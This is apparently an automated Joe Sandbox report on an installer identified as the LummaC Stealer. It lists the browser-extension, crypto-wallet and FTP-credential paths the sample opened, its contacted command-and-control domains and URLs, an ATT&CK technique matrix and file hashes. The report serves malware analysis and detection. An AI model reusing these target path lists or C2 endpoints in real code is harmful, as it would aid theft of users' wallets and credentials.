      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\DocumentsJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\CURQNKVOIXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\405361\Weapons.comDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      DLL Side-Loading      		1
      Deobfuscate/Decode Files or Information      		2
      OS Credential Dumping      		13
      File and Directory Discovery      		Remote Services1
      Archive Collected Data      		3
      Ingress Tool Transfer      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts12
      Process Injection      		2
      Obfuscated Files or Information      		11
      Input Capture      		25
      System Information Discovery      		Remote Desktop Protocol31
      Data from Local System      		11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      Command and Scripting Interpreter      		Logon Script (Windows)Logon Script (Windows)1
      DLL Side-Loading      		Security Account Manager11
      Security Software Discovery      		SMB/Windows Admin Shares11
      Input Capture      		4
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal Accounts1
      PowerShell      		Login HookLogin Hook11
      Masquerading      		NTDS3
      Process Discovery      		Distributed Component Object Model1
      Clipboard Data      		15
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script121
      Virtualization/Sandbox Evasion      		LSA Secrets121
      Virtualization/Sandbox Evasion      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
      Process Injection      		Cached Domain Credentials1
      Application Window Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579048 Sample: Set-up.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 39 chillysalvagk.click 2->39 41 lWQLYFSSyUSsI.lWQLYFSSyUSsI 2->41 43 kliptizq.shop 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected LummaC Stealer 2->57 59 4 other signatures 2->59 10 Set-up.exe 33 2->10         started        signatures3 process4 process5 12 cmd.exe 3 10->12         started        file6 33 C:\Users\user\AppData\Local\...\Weapons.com, PE32 12->33 dropped 61 Drops PE files with a suspicious file extension 12->61 16 Weapons.com 12->16         started        20 cmd.exe 2 12->20         started        23 conhost.exe 12->23         started        25 7 other processes 12->25 signatures7 process8 dnsIp9 35 chillysalvagk.click 172.67.202.229, 443, 49735, 49737 CLOUDFLARENETUS United States 16->35 37 kliptizq.shop 104.21.84.113, 443, 49745 CLOUDFLARENETUS United States 16->37 45 Suspicious powershell command line found 16->45 47 Query firmware table information (likely to detect VMs) 16->47 49 Tries to harvest and steal ftp login credentials 16->49 51 2 other signatures 16->51 27 powershell.exe 7 16->27         started        31 C:\Users\user\AppData\Local\Temp\405361\W, data 20->31 dropped file10 signatures11 process12 process13 29 conhost.exe 27->29         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Set-up.exe16%ReversingLabsWin32.Trojan.Generic

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\405361\Weapons.com0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      chillysalvagk.click
      		172.67.202.229
      		truetrue
        		unknown
        kliptizq.shop
        		104.21.84.113
        		truefalse
          		unknown
          lWQLYFSSyUSsI.lWQLYFSSyUSsI
          		unknown
          		unknownfalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://kliptizq.shop/int_clp_ldr_sha.txtfalse
              		unknown
              https://chillysalvagk.click/apitrue
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://www.cloudflare.com/learning/access-management/phishing-attack/powershell.exe, 0000000F.00000002.2126884415.0000000004CA4000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/pscore6lBpowershell.exe, 0000000F.00000002.2126884415.0000000004941000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://www.cloudflare.com/learning/access-management/phishing-attack/Dpowershell.exe, 0000000F.00000002.2126502203.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://www.cloudflare.com/learning/access-management/phishpowershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://www.cloudflare.com/learning/access-management/phishing-atX)powershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://www.cloudflare.com/5xx-error-landingmancelpowershell.exe, 0000000F.00000002.2126502203.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.cloudflare.com/5xx-error-landinghZ$ld0powershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.cloudflare.com/learning/access-management/phishhZ$lpowershell.exe, 0000000F.00000002.2126884415.0000000004CED000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.autoitscript.com/autoit3/XWeapons.com, 0000000A.00000000.1760492941.0000000000BA5000.00000002.00000001.01000000.00000006.sdmp, Algeria.0.dr, Weapons.com.1.drfalse
                                  		high
                                  http://nsis.sf.net/NSIS_ErrorErrorSet-up.exefalse
                                    		high
                                    https://www.cloudflare.com/learning/access-management/phishing-attack/class=cf-btnstyle=background-cpowershell.exe, 0000000F.00000002.2126502203.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2128883330.000000000702E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126502203.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126804763.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126395033.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.autoitscript.com/autoit3/Solo.0.dr, Weapons.com.1.drfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000F.00000002.2126884415.0000000004941000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.cloudflare.com/5xx-error-landingpowershell.exe, 0000000F.00000002.2126884415.0000000004CA4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.cloudflare.com/5xx-error-landingid=brand_linktarget=_blankpowershell.exe, 0000000F.00000002.2126502203.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2128883330.000000000702E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126502203.0000000000ACC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126804763.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2126395033.0000000000A80000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              172.67.202.229
                                              		chillysalvagk.clickUnited States
                                              		13335CLOUDFLARENETUStrue
                                              104.21.84.113
                                              		kliptizq.shopUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1579048
                                              Start date and time:2024-12-20 18:16:18 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 8s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:17
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:Set-up.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@25/24@3/2
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 32
                                              • Number of non-executed functions: 42
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Stop behavior analysis, all processes terminated

                                              Warnings

                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 2736 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: Set-up.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              12:17:14API Interceptor1x Sleep call for process: Set-up.exe modified
                                              12:17:19API Interceptor9x Sleep call for process: Weapons.com modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.84.113TT4ybwWc1T.exeGet hashmaliciousLummaC Stealer, zgRATBrowse
                                              • voloknus.pw/api

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              kliptizq.shop'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                              • 172.67.191.144

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSZiraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                              • 172.67.177.134
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                              • 172.67.197.170
                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.67.152
                                              Fortexternal.exeGet hashmaliciousUnknownBrowse
                                              • 172.67.75.163
                                              Loader.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.90.135
                                              Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.86.72
                                              nshkarm.elfGet hashmaliciousMiraiBrowse
                                              • 104.25.87.101
                                              hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 172.67.197.170
                                              gf3yK6i4OX.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.21.99
                                              0WO49yZcDA.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.21.99
                                              CLOUDFLARENETUSZiraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                              • 172.67.177.134
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                              • 172.67.197.170
                                              Statement_3029_from_Cross_Traders_and_Logistics_ltd.exeGet hashmaliciousMassLogger RATBrowse
                                              • 104.21.67.152
                                              Fortexternal.exeGet hashmaliciousUnknownBrowse
                                              • 172.67.75.163
                                              Loader.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.90.135
                                              Sentinelled.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.86.72
                                              nshkarm.elfGet hashmaliciousMiraiBrowse
                                              • 104.25.87.101
                                              hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 172.67.197.170
                                              gf3yK6i4OX.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.21.99
                                              0WO49yZcDA.exeGet hashmaliciousLummaCBrowse
                                              • 104.21.21.99

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRATBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              Loader.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              hBBxlxfQ3F.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              gf3yK6i4OX.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              0WO49yZcDA.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              uDTW3VjJJT.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              u1z7S3hr06.exeGet hashmaliciousLummaC, StealcBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              zhQFKte2vX.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              ddySsHnC6l.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113
                                              NAliwxUTJ4.exeGet hashmaliciousLummaCBrowse
                                              • 172.67.202.229
                                              • 104.21.84.113

                                              Dropped Files

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              C:\Users\user\AppData\Local\Temp\405361\Weapons.comnikDoCvpJa.exeGet hashmaliciousRemcosBrowse
                                                downloaded_exe.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                  Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                    main.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                      deb.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                        pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                                          QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                            'Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                              CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                CapCut_12.0.4_Installer.exeGet hashmaliciousLummaC StealerBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):0.6599547231656377
                                                                  Encrypted:false
                                                                  SSDEEP:3:NlllulRlltl:NllU
                                                                  MD5:2AAC5546A51052C82C51A111418615EB
                                                                  SHA1:14CFBEF3B3D238893C68F1BD6FE985DACF1953F1
                                                                  SHA-256:DBBA7151765EDB3661C0B1AD08037C0BDDC43227D2F2E8DDAC33C4A1E7C4151F
                                                                  SHA-512:1273F4B0365E213134E7FBC3BE45CAC33CB32AB6CED85479905C702F0429A0491A5E9C878E5FEFFA05BB0D1AA7F704949D13DD1DA9FCEB93665F1CC110FB24B8
                                                                  Malicious:false
                                                                  Preview:@...e...........................................................

                                                                  C:\Users\user\AppData\Local\Temp\405361\W

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):485961
                                                                  Entropy (8bit):7.999602922296637
                                                                  Encrypted:true
                                                                  SSDEEP:6144:dkix16Iad4JhrzB83z9LoElMN8SU3JWsSxeSoNnNVqr+NmsjErspfETKMiwwNo:dZ6Iadgh3W3zVzkstSxs2qNxjErzTYo
                                                                  MD5:5AD863750BBCD2BDDF2237369775DE38
                                                                  SHA1:74C4654A0870653DD03B3E76EEEE96F43A88ED9B
                                                                  SHA-256:37AE8859225BDDBF6CB1E541CE8780384CCA0A5B81EBB4A2EF1CC33DA79E352F
                                                                  SHA-512:A4F94625B79D7D80317304A2046189582ECD825EF75AF066FF0C0F459619D4C3D9A52CBC9A49E0CC4DFC1F450234D6F434E7FC882FFF4E33B2D355D8D7455AF1
                                                                  Malicious:true
                                                                  Preview:W..Q....)5t...1^..#....*.#<...;H0_......6..?H..2.s........A?7.,n.])W..tS.......V..P."..1(....zlE._.:..~M,......3.a...L.\.....]c....iMN..{g.](,g........%..`.E.]c..6.o...........m.SJ..,.e.<.w....U..g+.l....,>.A_....!..{.=b%>...V.'.&A..E...W'...|.R.x4...".....rQ.6.S.|#.:.l#.g......t..9.}.f'.).>v.;.O...o..@..G...t...3.w.Fl..C....\....8{..p.p:.)..3......8.<......X.t.F[.*...M....of.U...j...c.B~.3F...bm.s.?I....z!,.p..~...k0eV....W.m..(.,.........q.5....B|.:..Y.....G....(..VG.@.<{2P.Y|=.....BD>.b.._g.."q.......aU'3.Z.U5..3*.x....J..h.Mn..Q...{...\..T.1...F.\....^a...y....n.+....iH=.....?.iL.W....R*XV".ZOMi.......h...&.r......]m.&..bUN.zoky...d@kh.1..$.l...B.Ku.}...K..^K..3....A(J><.vq.....8l .FJ.Os .c.D..y`.lL...6T.0..U..q.../.z.?..w.i=.es..W.7....O...ka2..J..h.3.[.e=k.i.....a.+..8=.o...P)......q...o).g.W.<..VO{......A.T.>.B@...".2>.w...@2.......!.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI.

                                                                  C:\Users\user\AppData\Local\Temp\405361\Weapons.com

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:modified
                                                                  Size (bytes):947288
                                                                  Entropy (8bit):6.630612696399572
                                                                  Encrypted:false
                                                                  SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                  MD5:62D09F076E6E0240548C2F837536A46A
                                                                  SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                  SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                  SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Joe Sandbox View:
                                                                  • Filename: nikDoCvpJa.exe, Detection: malicious, Browse
                                                                  • Filename: downloaded_exe.exe, Detection: malicious, Browse
                                                                  • Filename: Corporate_Code_of_Ethics_and_Business_Conduct_Policy_2024.pdf.lnk.d.lnk, Detection: malicious, Browse
                                                                  • Filename: main.exe, Detection: malicious, Browse
                                                                  • Filename: deb.exe, Detection: malicious, Browse
                                                                  • Filename: pM3fQBuTLy.exe, Detection: malicious, Browse
                                                                  • Filename: QIo3SytSZA.exe, Detection: malicious, Browse
                                                                  • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                  • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
